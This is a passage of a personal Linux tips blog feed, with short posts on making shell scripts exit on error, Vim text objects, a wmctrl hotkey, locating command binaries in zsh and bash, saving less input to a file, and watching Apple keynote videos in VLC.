using<br /><pre><code>set -e</code></pre>and in zsh using<br /><pre><code>setopt err_exit</code></pre>So your script would essentially look like this:<br /><pre><code>#!/bin/bash<br />set -e<br />make<br />make test<br />make push</code></pre>zsh also has a <code>err_return</code> option that can be set to make a function return (as opposed to terminating the whole script) when a command invoked by a function fails.<img src="" height="1" width="1" alt=""/>Muthu Kannan's text objects<div dir="ltr" style="text-align: left;" trbidi="on">Let's say I have this line in a file:<br /><blockquote><pre><code>logging.info("some boring message")</code></pre></blockquote>and I want to change it to:<br /><blockquote><pre><code>logging.info("request served")</code></pre></blockquote>For a long time I did it this way:<br />1. keep the cursor on '<code>s</code>' of '<code>some</code>'<br />2. type <kbd>ct"</kbd> (which means change till (the first) <code>"</code> character)<br />3. type <kbd>request served</kbd>.<br /><br />Recently I figured there's an easier/faster way:<br />1. keep the cursor anywhere inside the <code>"some boring message"</code> string<br />2. type <kbd>ci"</kbd> (which means change <i>inside quotes</i>)<br />3. type <kbd>request served</kbd>.<br /><br />Like every Vim feature, this is just one among a dozen or so possible selections. Check out <a href="">text objects</a> section in Vim manual.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan key to switch to any app<div dir="ltr" style="text-align: left;" trbidi="on">I :)<br /><br />I had to install <code>wmctrl</code> first (<code>sudo apt-get install wmctrl</code> on Ubuntu). And then I bound the shortcut key <kbd>Ctrl+Shift+K</kbd> from my KDE's settings dialog to run the command <code>wmctrl -x -a konsole.Konsole</code>. <code>-x</code> says that I would be specifying windows using their WM_CLASS values; <code>-a</code> activates the window that follows it. To get the list of currently open window with their WM_CLASS values, I used the command <code>wmctrl -xl</code>.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan information about commands you use<div dir="ltr" style="text-align: left;" trbidi="on"><b>Q</b>: How to find out where the binary of a command I'm running?<br /><b>A</b>: You can use <i>type</i> command (available on both zsh and bash):<br /><pre><code>% type ls<br />ls is an alias for ls -h --color=auto<br />% type cat<br />cat is /bin/cat<br />% type alias<br />alias is a shell builtin</code></pre><br /><b>Q</b>: Sometimes I want to know if a command is a shell script or a compiled binary. How do I do that?<br /><b>A</b>: If you use zsh, you can use <i>=command</i> to get to <i>command</i>'s full path.<br /><pre><code>% file =backup<br />/home/manki/d/bin/backup: a /bin/rbash script text executable<br />% # To show you what =backup actually translates to</code><code><br />% echo =backup<br />/home/manki/d/bin/backup<br /></code></pre>If you use bash, you can use type command within <a href="">backticks</a> or the equivalent $(...).<br /><pre><code>$ file `type -p backup`<br />/home/manki/d/bin/backup: a /bin/rbash script text executable</code></pre>When you have aliases, this can get tricky. On bash I don't know how to do this, but zsh is smart enough to find the executable even when you have aliases set up. For instance, I have aliased <i>ls</i> to <i>ls -h --color=auto</i>, but zsh gives me the right binary for <i>=ls</i>:<br /><pre><code>% file =ls <br />/bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, stripped</code></pre><br /></div><img src="" height="1" width="1" alt=""/>Muthu Kannan the input to `less' command<code>less</code> is good for viewing long outputs from other programs. There may be times when you pipe the output of a program to <code>less</code> and realise only later that you want the output in a file... maybe because you need to send the output to someone via email.<br /><br />You can quit <code>less</code> and change the command line to output to a file. But there are better/faster options. <code>less</code> supports an <a href=""><code>s</code> command</a> to save its input to a file. Just press <code>s</code>, enter a file path to save the text to, and you're done.<img src="" height="1" width="1" alt=""/>Muthu Kannan Apple's Keynote Videos in Linux<div dir="ltr" style="text-align: left;" trbidi="on">Essentially, you’d have to dig through Apple site’s HTML/JavaScript and find the video URL for Windows. And then pass that URL to a stand-alone media player like VLC.<br /><br />Apparently Chrome for Linux has a QuickTime plugin! (Or it’s bundled with Ubuntu; I am not sure.) Watch <a href="">Sep 2012</a> event (iPhone 5 launch) is available at <a href="">goo.gl/Nn77F</a>.<br /><br />Watch <a href="">Mar 7, 2012 iPad event</a> video using this command:<br /><pre style="overflow-x: scroll;"><code>vlc ''</code></pre><br />Watch <a href="">Oct 4, 2011 iPhone event</a> video using this command:<br /><pre style="overflow-x: scroll;"><code>vlc ''</code></pre>----- <br />If you have a Linux computer, you cannot watch Apple’s WWDC 2011 keynote video from <a href="">Apple’s web site.</a> Because the site picks a video URL based on what your browser/OS is, but it fails miserably if you don’t run an Apple OS or Windows. So, if you want to see the video, open <a href=""></a> on VLC Media Player and you’ll be good.</div><img src="" height="1" width="1" alt=""/>Muthu Kannan
|
http://feeds.feedburner.com/MankisLinuxTips
|
CC-MAIN-2019-13
|
refinedweb
| 4,037
| 64.2
|
Godot scenes and scripts are classes¶
In Godot, scripts and scenes can both be the equivalent of classes in an Object-Oriented programming language. The main difference is that scenes are declarative code, while scripts can contain imperative code.
As a result, many best practices in Godot boil down to applying Object-Oriented design principles to the scenes, nodes, or script that make up your game.
This guide explains how scripts and scenes work in the engine's core, to help you get a sense of how Godot works under the hood, and to help you better understand where some of this series' best practices come from.
Making sense of classes in Godot¶
Godot Engine provides built-in classes like Node. User-created types:
- 속성
- 메서드
- 상수
- 시그널
This
ClassDB is what Objects check against when performing an operation like
accessing a property or calling a method.
ClassDB checks the database's
records and the records of the Object's base types to see if the Object supports
the operation.
On the engine's side, every class defines a static
_bind_methods() function
that describes what C++ content it registers to the database and how. When you
use the engine, you can extend the methods, properties, and signals available from
the
ClassDB by attaching a Script to your node.
Objects check their attached script before the database. This is why scripts can
override built-in methods. If a script defines a
_get_property_list() method,
Godot appends that data to the list of properties the Object fetches from the
ClassDB. The same is true for other declarative code.
Even scripts that don't inherit from a built-in type, i.e. scripts that don't
start with the
extends keyword, implicitly inherit from the engine's base
Reference class. This allows the Object to defer
to the script's content where the engine logic deems appropriate.
주석
As a result, you can instance scripts without the
extends keyword
from code, but you cannot attach them to a Node
Scripting performances and PackedScene¶
As the size of Objects increases, the scripts' necessary size to create them grows much, much larger. Creating node hierarchies demonstrates this. Each individual Node's logic could be several hundred lines of code in length.
Let's see a simple example of creating a single
Node as a child. The code
below creates a new
Node, changes its name, assigns a script to it, sets its
future parent as its owner so it gets saved to disk along with it, and finally
adds it as a child of the
Main node:
# Main.gd extends Node func _init(): var child = Node.new() child.name = "Child" child.script = preload("Child.gd") child.owner = self add_child(child)
using System; using Godot; namespace ExampleProject { public class Main : Resource { public Node Child { get; set; } public Main() { Child = new Node(); Child.Name = "Child"; Child.Script = (Script)ResourceLoader.Load("child.gd"); Child.Owner = this; AddChild(Child); } } }
Script code like this is much slower than engine-side C++ code. Each change makes a separate call to the scripting API which leads to many "look-ups" on the back-end to find the logic to execute.
Scenes help to avoid this performance issue. PackedScene, the base type that scenes inherit from, are resources that use serialized data to create objects. The engine can process scenes in batches on the back-end and provide much better performance than scripts.
Scenes and scripts are objects¶
Why is any of this important to scene organization? Because scenes are objects. One often pairs a scene with a scripted root node that makes use of the sub-nodes. This means that the scene is often an extension of the script's declarative code.
The content of a scene helps to define:
- What nodes are available to the script
- How they are organized
- How are they initialized
- What signal connections they have with each other
Many Object-Oriented principles which apply to written code also apply to scenes.
The scene is always an extension of the script attached to its root node. You can see all the nodes it contains as part of a single class.
Most of the tips and techniques explained in this series will build on this.
|
https://docs.godotengine.org/ko/latest/getting_started/workflow/best_practices/what_are_godot_classes.html
|
CC-MAIN-2019-39
|
refinedweb
| 705
| 70.63
|
As a first step into learning Scala and as one who is familiar with Java, let us compare the customary Helloworld programs in Java and Scala. You might already know that to run a Java program, there must be a public class with a main method that takes one parameter, a String[ ], and has a void return type.
also read:
For example:
package javaapplication; public class Main { public static void main(String[] args) { System.out.println("Hello World"); } }
In Scala, an equivalent program looks something as follows –
package scalaapplication object Main { def main(args: Array[String]): Unit = { println("Hello World") } }
The output of both of the above programs is to print out Hello World. We compare and contrast the first programs in Java and Scala as follows:
- Both the programs begin with a package declaration. While the package statement or rather every statement in the Java program ends with a semi-colon, semicolon is not mandatory in the Scala program. In a Scala program, the compiler does not care whether a statement ends with a semicolon or not. Newline marks end of a statement and beginning of another. Semicolon is required though when multiple statements are written in a single line.
- While import statement is not shown in the above simple programs, they can both be part of a program in Java as well as Scala. Scala provides an easier and more concise way to import multiple statements as we will see in a later post.
- The major contrast between the two programs is that while the Java program has a class declaration, the Scala program has an object declaration.
Conceptually, a class is a blueprint for objects. An object is a concrete instance of a class.
In Java, we create an object using the new keyword followed by the class name. In Scala, we can directly define an object as shown above. We can also, of course, define classes and create objects using new keyword as in Java. The reason why we have defined an object instead of a class in the equivalent Scala program is described in a short while.
- Before we move on, in both programs, the Java class and the Scala object are public. In Java, the modifier named public needs to be used to mark a class/class member as public. In Scala, by default a class/class member is public. That is, when there is no access modifier, it means that the class/class member has public access.
- Main Methods are defined in very similar yet different ways in Java and Scala programs. An illustration for the main method definitions as they compare with each other in the two languages follows -
def is the keyword that marks the beginning of any function definition in Scala. There is no such equivalent keyword in Java. The main point of difference is the absence of the static keyword in the Scala main method definition.
As Scala is a purely object oriented language, there are no static things in Scala. Nevertheless, in order to achieve a similar behavior, Scala allows defining of something called as singleton objects. Just for now, a singleton object is one which looks like a class definition but with keyword object instead of class. In the above Scala program, Main is a standalone singleton object. To put it simplistically, for a Java programmer, a singleton object in Scala, is an equivalent holder of static methods if it were Java. So, now we know why we have defined an object in the above Scala program instead of a class.
The next important thing that can be noticed is the keyword ‘Unit‘ in the Scala main method definition. Unit is a return type for a function. Unit is used as a result type in a method, if all the method does is produce a side effect and not return any specific value as such. In our case, the side effect is printing out “Hello World”.
- Both the programs use curly braces to mark the beginning and end of method or class.
- While Java implicitly imports members of the package java.lang into every Java source file, Scala implicitly imports members of the packages java.lang and scala as well as members of the singleton object named Predef into every Scala source file.
The println method call in the Scala example above is actually made on Predef.
- In Java, a public class must be in a file of the same name. In contrast, in Scala, a public class need not necessarily be in a file of the same name. Though, it is thoroughly recommended to have it in a file of the same name just to make it easier for the programmers to locate classes.
- Now, lets try and run the above programs at the command prompt.
Java :
$ javac Main.java $ java Main $ Hello World
Scala:
$ scalac Main.scala $ scala Main $ Hello World
As we can see, running the programs in the two languages is pretty similar. The output of a java compiler as well as a scala compiler is a Java class file. This class file can then run on the same JVM to produce the output
$ Hello World
[…] Getting started with Scala. […]
|
http://www.javabeat.net/java-helloworld-vs-scala-helloworld/
|
CC-MAIN-2014-49
|
refinedweb
| 867
| 71.14
|
NumPy is a popular Python library that offers a range of powerful mathematical functions. The library is widely used in quantitative fields, such as data science, machine learning, and deep learning. We can use NumPy to perform complex mathematical calculations, such as matrix multiplication.
Matrix multiplication can help give us quick approximations of very complicated calculations. It can help us with network theory, linear systems of equations, population modeling, and much more. In this tutorial, we’ll explore some basic computations with NumPy matrix multiplication.
Let’s get started!
We’ll cover:
Get hands-on with NumPy for free.
Learn the fundamentals of Python data analysis with Educative’s 1-week free trial.
Python Data Analysis and Visualization
NumPy is an open-source Python library that we can use to perform high-level mathematical operations with arrays, matrices, linear algebra, Fourier analysis, and more. The NumPy library is very popular within scientific computing, data science, and machine learning. NumPy is compatible with popular data science libraries like pandas, matplotlib, and Scikit-learn. It’s much faster than Python lists because it integrates faster codes, such as C and C++, in Python. It also breaks down our tasks into multiple pieces and processes each piece concurrently.
Before we get started, let’s make sure we have NumPy installed. If you already have Python, you can install NumPy with one of the following commands:
conda install numpy
or
pip install numpy
To import NumPy into our Python code, we can use the following command:
import numpy as np
import numpy as np A = [[6, 7], [8, 9]] print(np.array(A) [0,0])
In the above code, we have matrix A
[[6, 7], [8, 9]]. We ask for the element given at
(0,0), and our output returns
6. When we want to define the shape of our matrix, we use the number of rows by the number of columns. That means that matrix A has a shape of 2x2.
Now, let’s take a look at some different NumPy matrix multiplication methods.
There are three main ways to perform NumPy matrix multiplication:
np.dot(array a, array b): returns the scalar or dot product of two arrays
np.matmul(array a, array b): returns the matrix product of two arrays
np.multiply(array a, array b): returns the element-wise matrix multiplication of two arrays
Let’s take a closer look at each of the three methods:
Scalar multiplication is a simple form of matrix multiplication. A scalar is just a number, like
1,
2, or
3. In scalar multiplication, we multiply a scalar by a matrix. Each element in the matrix is multiplied by the scalar, which makes the output the same shape as the original matrix.
With scalar multiplication, the order doesn’t matter. We’ll get the same result whether we multiply the scalar by the matrix or the matrix by the scalar.
Let’s take a look at an example:
import numpy as np A = 5 B = [[6, 7], [8, 9]] print(np.dot(A,B))
Now, let’s multiply a 2-dimensional matrix by another 2-dimensional matrix. When multiplying two matrices, the order matters. That means that matrix A multiplied by matrix B is not the same as matrix B multiplied by matrix A.
Before we get started, let’s look at a visual for how the multiplication is done.
import numpy as np A = [[6, 7], [8, 9]] B = [[1, 3], [5, 7]] print(np.dot(A,B)) print("----------") print(np.dot(B,A))
Note: It’s important to note that we can only multiply two matrices if the number of columns in the first matrix is equal to the number of rows in the second matrix.
Get started with Python data analysis for free with our 1-week Educative Unlimited Trial. Educative’s text-based learning paths are easy to skim and feature live coding environments, making learning quick and efficient.
Python Data Analysis and Visualization
The
matmul() function gives us the matrix product of two 2-d arrays. With this method, we can’t use scalar values for our input. If one of our arguments is a 1-d array, the function converts it into a matrix by appending a 1 to its dimension. This is removed after the multiplication is done.
If one of our arguments is greater than 2-d, the function treats it as a stack of matrices in the last two indexes. The
matmul() method is great for times when we’re unsure of what the dimensions of our matrices will be.
Let’s look at some examples:
Multiplying a 2-d array by another 2-d array
import numpy as np A = [[2, 4], [6, 8]] B = [[1, 3], [5, 7]] print(np.matmul(A,B))
Multiplying a 2-d array by a 1-d array
import numpy as np A = [[5, 0], [0, 5]] B = [5, 2] print(np.matmul(A,B))
One array with dimensions greater than 2-d
import numpy as np A = np.arange(8).reshape(2, 2, 2) B = np.arange(4).reshape(2, 2) print(np.matmul(A.
Let’s look at an example:
import numpy as np A = np.array([[1, 3, 5, 7, 9], [2, 4, 6, 8, 10]]) B = np.array([[1, 2, 3, 4, 5], [5, 4, 3, 2, 1]]) print(np.multiply(A,B))
We can pass certain rows, columns, or submatrices to the
numpy.multiply() method. The sizes of the rows, columns, or submatrices that we pass as our operands should be the same. Let’s look at an example:
import numpy as np A = np.array([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]]) B = np.array([[11, 12, 13, 14, 15], [16, 17, 18, 19, 20]]) print(np.multiply(A[ 0,:], B[ 1,: ])) print("----------") print(np.multiply(A[ 1,:], B[ 0,:]))
Congrats on taking your first steps with NumPy matrix multiplication! It’s a complicated, yet important part of linear algebra. It helps us further our understanding of different aspects of data science, machine learning, deep learning, and other prevalent fields. There’s still a lot more to learn about NumPy and matrices. Some recommended topics to cover next are:
To get started learning these concepts and more, check out Educative’s learning path Python Data Analysis and Visualization. This hands-on learning path will help you master the skills to extract insights from data using a powerful assortment of popular Python libraries.
Happy learning!
Join a community of more than 1.2 million readers. A free, bi-monthly email with a roundup of Educative's top articles and coding tips.
|
https://www.educative.io/blog/numpy-matrix-multiplication
|
CC-MAIN-2022-21
|
refinedweb
| 1,110
| 65.12
|
sem_init − initialize an unnamed semaphore
#include <semaphore.h>
int sem_init(sem_t *sem, int pshared, unsigned int value);
Link with −pthread.
sem_init() initializes the unnamed semaphore at the address pointed to by sem. The value argument specifies the initial value for the semaph allocated.
Initializing a semaphore that has already been initialized results in undefined behavior.
sem_init() returns 0 on success; on error, −1 is returned, and errno is set to indicate the error.
For an explanation of the terms used in this section, see attributes(7).
POSIX.1-2001.
Bizarrely, POSIX.1-2001 does not specify the value that should be returned by a successful call to sem_init(). POSIX.1-2008 rectifies this, specifying the zero return on success.
sem_destroy(3), sem_post(3), sem_wait(3), sem_overview(7)
This page is part of release 3.53 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at−pages/.
|
http://man.linuxtool.net/centos7/u3/man/3_sem_init.html
|
CC-MAIN-2019-35
|
refinedweb
| 156
| 59.6
|
From: Caleb Epstein (caleb.epstein_at_[hidden])
Date: 2005-02-16 10:44:20
On Tue, 15 Feb 2005 23:11:49 -0500, Jason Hise <chaos_at_[hidden]> wrote:
>
> From everything I know, cin, cout, cerr, and clog are simply global
> variables that live in namespace std. Does this mean that the following
> code is dangerous?
AFAIK yes. If you have a singleton object that is being destroyed at
exit, it is possible that cin/cout/clog etc have been closed before
Log::~Log is called.
> class Log
> {
> public:
> Log ( ) { std::clog << "Log created\n"; }
> ~ Log ( ) { std::clog << "Log destroyed\n"; }
> } global_log;
>
> If so, (and I know this is presumptuous, so strictly hypothetically
> speaking) could these four standard streams benefit by becoming
> singletons? Just a thought experiment...
--
|
https://lists.boost.org/Archives/boost/2005/02/80534.php
|
CC-MAIN-2021-04
|
refinedweb
| 125
| 61.46
|
Machine Learning Model as a Serverless App using Google App Engine | by Saed Hussain | Jan, 2021
[ad_1]
Create a folder for the project and download the code files for this article from the repository here.
Then navigate to this directory using terminal (
cd <path_to_dir>) and make sure that the virtual environment is active (
conda activate <env_name>).
Obviously, you can do the same using your favorite IDE. But make sure to activate a virtual environment (click here for VS Code). Otherwise, you will end up installing dependencies in your default environment, which could break other projects using that environment.
Now let’s take a look at the Streamlit app file (app.py).
Notice how by adding a simple import (
import streamlit as st), a regular data science script (with
pandas, numpy, model.predict(), etc.), gets converted in a Streamlit web app. All we have done is add Streamlit widgets to interact with the model, such as a text input widget, button widget, etc.
You can try running the example Streamlit app in the newly created virtual environment using
streamlit run app.py.
This should result in errors due to missing python modules in the virtual environment. You can use
pip install to install the missing modules one by one, as you encounter them until the app finally runs.
Or, you can install all the dependencies of the app, by using the dependency list in requirements.txt, which will replicate my environment in which the app was created and tested.
Install all the project dependencies into the virtual environment using the command
pip install -r requirements.txt.
You can create a dependency list like this for your own project, once completed, by running
pip freeze > requirements.txt .
Give some time for the installation of the modules to complete. When it’s done, you can run the Streamlit app in the virtual environment using the
streamlit run app.py command.
You should see your default browser pop up and display the app (on localhost, usually port 8051 by default). Feel free to play around with the numbers and see the model work.
Congratulations, you have built a web app in minutes to interact with a machine learning model! 😄
When you are done playing with the Streamlit app, you can shut the app server down using Ctrl + C in the terminal.
Read More …
[ad_2]
|
https://openbootcamps.com/machine-learning-model-as-a-serverless-app-using-google-app-engine-by-saed-hussain-jan-2021/
|
CC-MAIN-2021-10
|
refinedweb
| 390
| 63.09
|
A conditional variable is used to block and object until it is “notified” to makeup.
To use conditional variables, we need to use below header:
#include <condition_variable> // std::condition_variable
Below are the Wait functions
Below are the Notify functions
Suppose you have a bank account with 0 balance. In such case, if a withdraw and a deposit request comes at same time, withdraw request will need to wait till the deposit can happen.
In such cases, the withdraw can wait for some time and after deposit, it can notify the withdraw thread to withdraw money.
Now let us understand with the help of an example:
Example:
In the below example, I have created 2 methods. deposit() and withdraw().
In the main() function, we called withdraw first, as the initial balance is 0, it will wait till the deposit occurs.
Then we call deposit() function, it will deposit the money.
Then we shall notify the waiting thread.
Then the withdraw() will be called, and amount will be withdrawn.
#include <iostream> // std::cout #include <chrono> // std::chrono::milliseconds #include <thread> // std::thread #include <mutex> // std::timed_mutex #include <condition_variable> // std::condition_variable // for more tutorials on C, C++, DS visit using namespace std; std::condition_variable cv; std::mutex mtx; int balance = 0; void deposit(int money) { std::lock_guard<mutex> lg(mtx); balance = balance + money; cout<<"The current balance is "<<balance<<endl; cv.notify_one(); } void withdraw(int money) { std::unique_lock <mutex> ul(mtx); cv.wait(ul, [] { return (balance != 0) ? true : false; }); if ( balance >= money) { balance -= money; cout<<"The amount has been withdrawn"<<endl; } else { cout<<"The current balance is less than the amount"<<endl; } cout<<"The current balance is"<<balance<<endl; } int main () { std::thread t1 (withdraw, 400); std::thread t2 (deposit, 600); t1.join(); t2.join(); return 0; }
Output:
The current balance is 600 The amount has been withdrawn The current balance is 200
|
https://www.prodevelopertutorial.com/c-11-feature-c-multithreading-chapter-10-conditional-variables-in-c-threading/
|
CC-MAIN-2020-16
|
refinedweb
| 310
| 52.7
|
Catalyst::Utils - The Catalyst Utils
Catalyst Utilities.::Controller::Foo::Bar becomes /tmp/my/app/c/foo/bar
Returns a list of files which can be tested to check if you're inside a checkout
Returns home directory for given class.
Note that the class must be loaded for the home directory to be found using this function.
Tries to determine if
$path (or cwd if not supplied) looks like a checkout. Any leading lib or blib components will be removed, then the directory produced will be checked for the existance of a
dist_indicator_file_list().
If one is found, the directory will be returned, otherwise false.
Returns a prefixed action.
MyApp::Controller::Foo::Bar, yada becomes foo/bar/yada
Returns an HTTP::Request object for a ur.
Method which adds the namespace for plugins and actions.
__PACKAGE__->setup(qw(MyPlugin)); # will load Catalyst::Plugin::MyPlugin
Catalyst Contributors, see Catalyst.pm
This library is free software. You can redistribute it and/or modify it under the same terms as Perl itself.
|
http://search.cpan.org/~mstrout/Catalyst-Runtime-5.90010/lib/Catalyst/Utils.pm
|
CC-MAIN-2016-36
|
refinedweb
| 168
| 50.73
|
Asked by:
How to convert an infopath file pdf
Question
All replies
Thanks micvos. Finally I got a single reply from this forum.This is for the first time I need to wait for many days for a reply in this forum.
Thanks for your mind. Let me give some more details. Infopath form templates has .xsn. But when we fill the form and save it, it is stored as .xml.
can u suggest any method for converting this .xml with xsl to pdf?
I already got one add-in from microsoft which can do the same. But I want to do it in a button click.This is not possibile with add-in, because , we need to go to file menu and click on 'Export to pdf' option.
I am now thinking in a way to use crystalreport for the same. Can you give any input?
thanks in advance...
akjal
Hi
U can get help regrading how to Add the Form Control to the Visual Studio 2005 Project in this link.
Install 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS u can get addin from this link
After adding the FormControl to the windows application and installing Microsoft Add-in.
This code helps to conver the infopath(*.xml) file to the PDF.
using Microsoft.Office.InfoPath;
using Microsoft.Office.InfoPath.FormControl
// file refers the source file path
// finalFilename is the destination file path
FormControl1.Open(file);
MessageBox.Show("Confirm of exporting Document" + finalFileName);
FormControl1.XmlForm.CurrentView.Export(finalFileName + ".pdf", Microsoft.Office.InfoPath.ExportFormat.Pdf)
instead of PDF there are two option available
XPS Microsoft.Office.InfoPath.ExportFormat.Xps
MHT Microsoft.Office.InfoPath.ExportFormat.Xps
Hi Mikedopp,
By default there is no option to convert the infopath file to PDF. So Microsoft gives addin to overcome the issue you can download the 2007 Microsoft Office Add-in: Microsoft Save as PDF or XPS from this link
Once you installed then there is a option in the file menu export to PDF and XPS in the Infopath 2007.
Programmatic Approach
Add the Form Control to Windows Application
Form control is a COM object, so by default it will not available in toolbox. So the First step is to add the Form control to the toolbox under the general tab.
These are the below steps to add a FormControl on the Toolbox.
1) Toolbox -> Go to General Tab -> Right click on it
2) Select ChooseItems you will get window (Choose Toolbox items) click Browse button
3) Go to path ("E:\Program Files\Microsoft Office\Office12") most probably this may the path oterwise go to loaction where the Office 2007 is installed
4) There you can find the Microsoft.Office.InfoPath.FormControl.dll select the dll
5) Know you cand find the FormControl under the tab of .Net FrameWork Components(select the FormControl and Click OK)
6) Use can see FormControl in the General tab.
7) Drag and drop in Windows Application
In the Button click Event
1) FormControl1.Open(SourceInfopath) (ie Opening a infopath form in FormControl)
2) Application.DoEvents() (try with Application.DoEvents() if u get error like View is not ready then place a MessageBox and just pop
some Message)3) FormControl1.XmlForm.CurrentView.Export(Destinationpath, Microsoft.Office.InfoPath.ExportFormat.Pdf )
you can ask what is the use of the second line. Here is the trick lies FormControl is the COM Object and it takes time to load. So we are giving some time to complete the Formload operation(By giving DoEvents() or by prompting MessageBox). FormControl1.open() doesn't return anything we don't have any option to know wheather FormControl loaded the infopathForm.
Most of us can get View is not ready error this is beacuse of the above reason. Because formcontrol takes time to load within that period we may try to Export operation. So in this case we may get View is not ready to avoid use the above operation
If Some one find the better way of tackling the above said error let me know
Thanks
coolmadhan123
A low tech way to convert an Infopath file to pdf is to copy & paste the form into MS Word, "save as" html then use Adobe Acrobat to convert the new file to a pdf. Most of the fields function properly and save properly. You may need to add text boxes since those don't seem to carry over. This method is a little cumbersome and not real fast but does work. If your form is large, you may need to copy and paste into several smaller documents. But you can combine them in the final Acrobat version.
- So let me clarify just for my understanding. I will need to create a activex/com component to do the saving as a pdf? Also is there a way to use the submit button to export/save the pdf programatically to a sharepoint url?
Once again thank you for your all your help.
Forgive my lack of knowledge of this.
Mike
- Ok so in reply to my own question. Here is a better way without a active x com object.
I know I am sorry for the jscript but here it goes.
Add this to the onclick event and have full trust enabled.
{
XDocument.View.Export("C:\\MyView.pdf", "PDF");
}
More at
Hi,
You may use any image capturing program, such as SNAGIT
AbuAhmed
hello there,
I had the same problem with infopath to pdf conversion, i tried to use microsoft Microsoft Save as PDF or XPS, but i had a lot of problems with page breaks, positioning of an elements, tables etc. I tried also to use xslt extracted from XSN file to convert it to html and then to pdf - this was to complicated and i had some weird results. I tried also external components ( i tried all that google returns from search :) ). Thing is that all this methods are good in case of small and not complicated infopath forms. My form printout has up to 100 pages, a lot of pictures, attachements tables, and runtime evaluated expression boxes (for multilanguage support). Finally i used InfoPathToPdf.exe from a-pdf, and i just run it from my code. It uses just a virtual priter and INFOPATH - maybie it is not so elegant - but it works ! I find it as the best solutiuon for infopath to pdf conversion on the market and it costs something about 30$
This code has worked for me. I added a button called "Print" to my InfoPath form and programmed the following against it (VB.Net):
Public Sub Print_Clicked(ByVal sender As Object, ByVal e As ClickedEventArgs)
Dim filename As String
Dim nameNode As XPathNavigator
nameNode = MainDataSource.CreateNavigator().SelectSingleNode("insert the XPath to the field on which you want the name of the pdf based on", NamespaceManager)
filename = nameNode.Value + ".pdf"
Me.CurrentView.Export("C:\" + filename, ExportFormat.Pdf)
- Batch print InfoPath Forms using the PDF Converter for SharePoint
- Converting InfoPath forms including all attachments to a single PDF file
- Controlling which views to export to PDF format in InfoPath
- Using SharePoint Forms Services to convert InfoPath forms to PDF format
- Converting Office files to PDF Format using a Web Services based interface
- Using the PDF Converter from a SharePoint workflow
Hi Micvos
I am getting problem at convert a infopath template to XMl using vsta.
one another Q. if i want to conert preprinted form means any paper form which i had scan & import to
infopath then how to edit that one or directly convert in XML
thanx
if got some stuff mail me lala.waghmode@gmail.com
I don't know the method about code, maybe there is proper one can fix the problem.
I just want to show my way to export as pdf file. I think the "save as PDF/XPS" feature can't deal with the infopath so well as there are many tables, images, blabla... So actually you can use a print driver-PDF Creator
For the infopath file is printable files. In the print dialog, choose he pdf creator as the virtual printer, tick the print to file checkbox.
Then it will be added to pdf creator and you can further define the settings like security and compression to get expected files. Then wait for the output opened in the adobe reader.
Of course capture it as image file then export to pdf file is feasible by the creator but it's time-consuming if have a bunch file to go.
Never too old to learn
- For something like this why not just print it to cutepdf or pdf creator?
- Proposed as answer by Derek.Wilkes Tuesday, July 05, 2011 11:42 AM
Hi motnis,
If you are trying to generate a pdf from the xml, you could use to generate your pdf on the fly.
The basic logic will be :
- Parse your InfoPath XML
- Process the XML to generate a PDF whith itextpdf library
Hope this helps.
Kind regards,
- Install Solid PDF Reader and print to pdf while in infopath
- Proposed as answer by Derek.Wilkes Tuesday, July 05, 2011 11:42 AM
- Try. This application quickly converts InfoPath to PDF, and supports batch jobs.
|
https://social.msdn.microsoft.com/Forums/vstudio/en-US/9f43f377-dfd6-4c6e-a361-315bf30f3c91/how-to-convert-an-infopath-file-pdf?forum=csharpgeneral
|
CC-MAIN-2017-13
|
refinedweb
| 1,531
| 63.29
|
__skb_insert, skb_insert, skb_append - insert an sk_buff into a list
#include <linux/skbuff.h> void __skb_insert(struct sk_buff *newsk, struct sk_buff *prev, struct sk_buff *next void skb_insert(struct sk_buff *old, struct sk_buff *newsk)) void skb_append(struct sk_buff *old, struct sk_buff *newsk))
skb_insert and skb_append are essentially wrapper functions for __skb_insert (see NOTES, below.) __skb_insert inserts newsk into list, and resets the appropriate next and prev pointers. prev and next are used to frame newsk in list. After setting the next and prev pointers in newsk, __skb_insert sets the prev pointer in next and the next pointer in prev, sets the list pointer in newsk, and incre- ments the qlen counter in list. skb_insert and skb_append should be used to add sk_buffs to a list rather than performing this task manually; in addi- tion to performing this task in a standardized way, these functions also provide for interrupt diasabling and prevent list mangling. Both of these functions use the list pointer in old to determine to which list newsk should be attached. The skb_insert function adds newsk to the list before old. The skb_append function adds newsk to the list after old.
None.
It is important to note the difference between not only skb_insert, skb_append and __skb_insert, but all the __skb_ functions and their skb_ counterparts. Essentially, the __skb_ functions are non-atomic, and should only be used with interrupts disabled. As a convenience, the skb_ func- tions are provided, which perform interrupt disable / enable wrapper functionality in addition to performing their specific tasks.
Linux 1.0+
intro(9), skb_queue_head(9), skb_queue_tail(9) /usr/src/linux/net/ax25/af_ax25.c /usr/src/linux/net/core/skbuff.c /usr/src/linux/net/ipv4/tcp_input.c /usr/src/linux/net/netrom/nr_in.c
Cyrus Durgin <cider@speakeasy.org>
|
http://www.linuxsavvy.com/resources/linux/man/man9/skb_insert.9.html
|
CC-MAIN-2018-05
|
refinedweb
| 294
| 61.26
|
import numpy as np
Suppose you are having a dinner party with 10 guests and 4 of them are allergic to cats. Because you have cats, you expect 50% of the allergic guests to sneeze during dinner. At the same time, you expect 10% of the non-allergic guests to sneeze. What is the distribution of the total number of guests who sneeze?
# Solution goes here
# Solution goes here
This study from 2015 showed that many subjects diagnosed with non-celiac gluten sensitivity (NCGS) were not able to distinguish gluten flour from non-gluten flour in a blind challenge..
"The gluten-containing flour was correctly identified by 12 participants (34%)..." Since 12 out of 35 participants were able to identify the gluten flour, the authors conclude "Double-blind gluten challenge induces symptom recurrence in just one-third of patients fulfilling the clinical diagnostic criteria for non-coeliac gluten sensitivity." we have to make some modeling decisions.).
Using this model, estimate the number of study participants who are sensitive to gluten. What is the most likely number? What is the 95% credible interval?
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
# Solution goes here
|
https://nbviewer.jupyter.org/github/AllenDowney/ThinkBayes2/blob/master/examples/gluten.ipynb
|
CC-MAIN-2021-10
|
refinedweb
| 197
| 55.44
|
Sony's New Bi-Pedal Robot 272
